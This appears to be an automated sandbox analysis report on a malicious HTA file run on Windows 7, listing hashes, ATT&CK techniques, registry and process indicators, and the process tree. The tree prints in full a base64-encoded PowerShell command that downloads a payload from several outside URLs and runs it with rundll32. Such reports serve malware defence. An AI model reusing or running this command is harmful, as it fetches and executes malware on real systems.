802d81674185613e93c065b0eb8d6b3f6e9897076e52c855b8709d91bdaa3da0

Analysis

max time kernel
14s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
21-04-2023 13:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uffscv.hta
Size

300KB
MD5

b01983b1cfd186bdead4b3cd329af828
SHA1

2b63d1664244bced4b8d9c61d656104bde270dfc
SHA256

416d3185feec3a22788c6ad0d76412a5603c0c725783e183366e8582199c7bee
SHA512

8f426caf1db51e6aefa250776f1feb3d0f3e00ceeff762b87e0b440463b3510d752d809a5a655e37eb260996164e4699bf923c2cf4f1ec4226682df231768fb4
SSDEEP

6144:3y3md4c3xh3GnQSwd9wMeEEdoocpTj86y3md4c3xh3Gj:3NZBsnQT9cONZBsj

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
520	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	520	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 520	2000	mshta.exe	28
PID 2000 wrote to memory of 520	2000	mshta.exe	28
PID 2000 wrote to memory of 520	2000	mshta.exe	28
PID 2000 wrote to memory of 520	2000	mshta.exe	28

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Uffscv.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAZgBsAGEAcwBoAGwAaQBrAGUAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwB2AGUAbABlAHkALgBjAG8ALwA1AHgAeABrADIATAAvAEMARwBrADIAQwBiADAAUAByACwAaAB0AHQAcABzADoALwAvAHUAdABpAGwAaQBtAGkAeABuAGEAdABhAGwALgBjAG8AbQAuAGIAcgAvAEQASgA5AGMALwBmAEUASQB5AFQAcAAsAGgAdAB0AHAAcwA6AC8ALwBsAG8AagBhAGwAegAxADQALgBjAG8AbQAuAGIAcgAvADgAagBKADMAYgAvADAARgBGAHYARwBrAHAALABoAHQAdABwAHMAOgAvAC8AYwBhAHAAcwBpAG0AcABvAHIAdABzAC4AcwBoAG8AcAAvAGgAcgBTAEQAaAAvAEEAZABBAFQAZABnAHQAcgAyACwAaAB0AHQAcABzADoALwAvAHIAZQBkAGIAbwBvAGsALgBjAGwAbwB1AGQALwA5AE8ARwB6AE4ASAAvADQAeAByAHcARgAsAGgAdAB0AHAAcwA6AC8ALwBkAHMAdAAuAGMAbwAuAHQAegAvAEEAcwBaAFcAdQBVAGwALwBnAEYAVwB2AFEAdwA1AGoAVAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABnAHIAZQBtAGkAYQBsAFMAYwBhAHIAcABlACAAaQBuACAAJABmAGwAYQBzAGgAbABpAGsAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAZwByAGUAbQBpAGEAbABTAGMAYQByAHAAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAaABvAGQAZABpAG4AVQBuAGgAbwBtAG8AbABvAGcAbwB1AHMALgBwAGUAcgB0AGkAbgBhAHQAZQBQAGEAcgBlAG4AZQBzAGkAegBlADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAaABvAGQAZABpAG4AVQBuAGgAbwBtAG8AbABvAGcAbwB1AHMALgBwAGUAcgB0AGkAbgBhAHQAZQBQAGEAcgBlAG4AZQBzAGkAegBlACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAG8AQQBHADgAQQBaAEEAQgBrAEEARwBrAEEAYgBnAEIAVgBBAEcANABBAGEAQQBCAHYAQQBHADAAQQBiAHcAQgBzAEEARwA4AEEAWgB3AEIAdgBBAEgAVQBBAGMAdwBBAHUAQQBIAEEAQQBaAFEAQgB5AEEASABRAEEAYQBRAEIAdQBBAEcARQBBAGQAQQBCAGwAQQBGAEEAQQBZAFEAQgB5AEEARwBVAEEAYgBnAEIAbABBAEgATQBBAGEAUQBCADYAQQBHAFUAQQBMAEEAQgBOAEEARwA4AEEAZABBAEIAawBBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/520-57-0x00000000027B0000-0x00000000027F0000-memory.dmp

Filesize
256KB

Download
memory/520-56-0x00000000027B0000-0x00000000027F0000-memory.dmp

Filesize
256KB

Download